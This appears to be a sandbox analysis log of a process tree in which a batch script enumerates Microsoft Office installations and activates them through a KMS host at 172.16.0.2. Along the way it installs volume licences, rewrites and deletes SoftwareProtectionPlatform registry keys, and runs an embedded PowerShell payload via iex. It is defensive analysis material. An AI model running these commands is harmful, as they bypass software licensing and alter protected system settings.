C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v PackageGUID4⤵
- Modifies registry key
PID:3592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:2884 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds4⤵
- Modifies registry key
PID:2732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs /v ActiveConfiguration" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3024 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs /v ActiveConfiguration4⤵
- Modifies registry key
PID:4036
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:2736 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:2024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3984 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:3432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingService get Version /value3⤵
- System Location Discovery: System Language Discovery
PID:116 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingService get Version /value4⤵PID:1952
-
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND LicenseStatus='1' AND PartialProductKey is not NULL" get Description3⤵PID:2760
-
-
C:\Windows\system32\findstr.exefindstr /V /R "^$"3⤵PID:5108
-
-
C:\Windows\system32\find.exefind /i "RETAIL channel" "C:\Windows\Temp\crvRetail.txt"3⤵PID:2024
-
-
C:\Windows\system32\find.exefind /i "RETAIL(MAK) channel" "C:\Windows\Temp\crvRetail.txt"3⤵PID:3444
-
-
C:\Windows\system32\find.exefind /i "TIMEBASED_SUB channel" "C:\Windows\Temp\crvRetail.txt"3⤵PID:2960
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "$f=[IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\active.bat') -split ':embdbin\:.*';iex ($f[5])"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4856
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663'" get LicenseFamily3⤵PID:1560
-
-
C:\Windows\system32\findstr.exefindstr /V /R "^$"3⤵PID:3592
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Professional2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:400
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusiness2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2960
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudent2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3732
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Home2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:544
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlus2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4408
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Standard2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:780
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Excel2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2044
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Outlook2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1340
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPoint2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1044
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Word2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5000
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Access2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5064
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusiness2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:116
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectPro2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3392
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStd2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5060
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioPro2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1648
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStd2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4564
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Professional2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4856
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusiness2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5108
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudent2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3280
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlus2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3592
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Standard2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:892
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Excel2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3288
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Outlook2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4404
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPoint2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3108
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Publisher2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:544
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Word2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1516
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Access2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3472
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusiness2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4548
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectPro2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4388
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStd2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2944
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioPro2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2240
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStd2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5084
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Professional2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1928
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusiness2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4740
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudent2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1480
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlus2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3920
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Standard2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3988
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Excel2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2024
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Outlook2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1560
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPoint2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3984
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Publisher2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:400
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Word2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2960
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Access2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3732
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusiness2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3024
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectPro2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2736
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStd2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5024
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioPro2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1452
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStd2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1340
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProfessionalRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3960
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusinessRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4484
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudentRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5064
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365ProPlusRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1080
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365BusinessRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3392
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365SmallBusPremRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:468
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365HomePremRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2220
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365EduCloudRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2860
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"MondoRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4684
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"StandardRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2320
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ExcelRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2636
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OutlookRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3444
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPointRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3384
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PublisherRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4920
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"WordRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3896
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"AccessRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2732
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusinessRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3360
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1516
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2244
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4548
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4388
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OneNoteRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2944
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlus2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2240
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Standard2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5084
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Excel2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4260
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Outlook2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4740
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPoint2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:468
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Publisher2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1480
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Word2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2220
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Access2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4684
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusiness2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2320
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectPro2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2636
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStd2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3444
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioPro2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3384
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStd2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4920
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"MondoVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3896
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"StandardVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2732
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ExcelVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4612
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OutlookVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2028
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPointVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4844
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PublisherVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4548
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"WordVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5076
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"AccessVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3392
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusinessVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2552
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:468
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1480
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2220
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4112
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OneNoteVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3592
-
-
C:\Windows\system32\reg.exe reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\BF982F93-3B3C-4CA1-8A6E-8130BEE5C625\ProPlusRetail.16 3⤵
- Modifies registry key
PID:2636
-
-
C:\Windows\system32\find.exefind /i "Office16ProPlusVL_KMS_Client" "C:\Windows\Temp\crvVolume.txt"3⤵PID:3444
-
-
C:\Windows\system32\reg.exe reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\BF982F93-3B3C-4CA1-8A6E-8130BEE5C625\ProPlusVolume.16 3⤵
- Modifies registry key
PID:3384
-
-
C:\Windows\system32\find.exefind /i "Office16MondoVL_KMS_Client" "C:\Windows\Temp\crvVolume.txt"3⤵PID:1464
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-bridge-office.xrm-ms"3⤵PID:3360
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root-bridge-test.xrm-ms"3⤵PID:1516
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root.xrm-ms"3⤵PID:1044
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-stil.xrm-ms"3⤵PID:4548
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-ul-oob.xrm-ms"3⤵PID:1928
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-ul.xrm-ms"3⤵PID:4524
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\pkeyconfig-office.xrm-ms"3⤵PID:468
-
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /f /v ProPlus2019Volume.OSPPReady3⤵
- Modifies registry key
PID:3280
-
-
C:\Program Files\Microsoft Office\root\integration\Integrator.exe"C:\Program Files\Microsoft Office\root\integration\integrator.exe" /I /License PRIDName=ProPlus2019Volume.16 PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root"3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:2220
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663'" get LicenseFamily3⤵PID:1928
-
-
C:\Windows\system32\find.exefind /i "ProPlus2019VL_"3⤵PID:4856
-
-
C:\Windows\system32\reg.exe reg add HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /f /v ProPlus2019Volume.OSPPReady /t REG_SZ /d 1 3⤵
- Modifies registry key
PID:3280
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:5084
-
-
C:\Windows\system32\findstr.exefindstr /I "ProPlus2019Volume"3⤵PID:3732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- System Location Discovery: System Language Discovery
PID:3108 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds4⤵
- Modifies registry key
PID:3896
-
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds /t REG_SZ /d "ProPlusRetail,ProPlus2019Volume" /f3⤵
- Modifies registry key
PID:5076
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:4388
-
-
C:\Windows\system32\findstr.exe findstr 2019 3⤵PID:4548
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:3960
-
-
C:\Windows\system32\findstr.exe findstr 2021 3⤵PID:1560
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:980
-
-
C:\Windows\system32\findstr.exe findstr 2024 3⤵PID:400
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingService where Version='10.0.19041.1266' call RefreshLicenseStatus3⤵PID:544
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msoxmled.exe"3⤵PID:1480
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "Description like '%KMSCLIENT%' AND NOT Name like '%MondoR_KMS_Automation%'" get Name /value3⤵PID:2760
-
-
C:\Windows\system32\find.exefind /i "Office 16" "C:\Windows\Temp\sppchk.txt"3⤵PID:4036
-
-
C:\Windows\system32\find.exefind /i "Office 19" "C:\Windows\Temp\sppchk.txt"3⤵PID:3024
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND NOT Name like '%O365%'" get Name /value3⤵PID:664
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:3108
-
-
C:\Windows\system32\find.exefind /i "Office 14"3⤵PID:4484
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:4260
-
-
C:\Windows\system32\find.exefind /i "Office 15"3⤵PID:4388
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:3960
-
-
C:\Windows\system32\find.exefind /i "Office 16"3⤵PID:4112
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:2024
-
-
C:\Windows\system32\find.exefind /i "Office 19"3⤵PID:980
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:780
-
-
C:\Windows\system32\find.exefind /i "Office 21"3⤵PID:3472
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:3988
-
-
C:\Windows\system32\find.exefind /i "Office 24"3⤵PID:1480
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND LicenseFamily like 'Office16O365%'" get LicenseFamily /value3⤵PID:2860
-
-
C:\Windows\system32\find.exefind /i "O365"3⤵PID:3544
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "Description like '%KMSCLIENT%'" get Name /value3⤵PID:4112
-
-
C:\Windows\system32\findstr.exefindstr /i Windows3⤵PID:4564
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL" get Name /value3⤵PID:4688
-
-
C:\Windows\system32\findstr.exefindstr /i Windows3⤵PID:4844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL" get GracePeriodRemaining /value 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:2028 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL" get GracePeriodRemaining /value4⤵PID:2732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingService get Version /value3⤵
- System Location Discovery: System Language Discovery
PID:3024 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingService get Version /value4⤵PID:4524
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2"3⤵PID:2960
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /t REG_SZ /d "1688"3⤵PID:1080
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2" /reg:32 3⤵PID:2736
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /t REG_SZ /d "1688" /reg:32 3⤵PID:4524
-
-
C:\Windows\system32\reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /reg:32 3⤵PID:1340
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2" /reg:32 3⤵PID:2240
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServicePort /t REG_SZ /d "1688" /reg:32 3⤵PID:4856
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f3⤵PID:3024
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2"3⤵PID:3544
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServicePort /t REG_SZ /d "1688"3⤵PID:1620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' " get ID /value3⤵
- System Location Discovery: System Language Discovery
PID:2736 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' " get ID /value4⤵PID:4524
-
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get LicenseStatus /value3⤵PID:2240
-
-
C:\Windows\system32\findstr.exefindstr "1"3⤵PID:1080
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:2024
-
-
C:\Windows\system32\findstr.exefindstr /i "2de67392-b7a7-462a-b1ca-108dd189f588"3⤵PID:4844
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588" /f3⤵PID:1340
-
-
C:\Windows\system32\reg.exereg delete "HKU\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /f3⤵
- Modifies data under HKEY_USERS
PID:3024
-
-
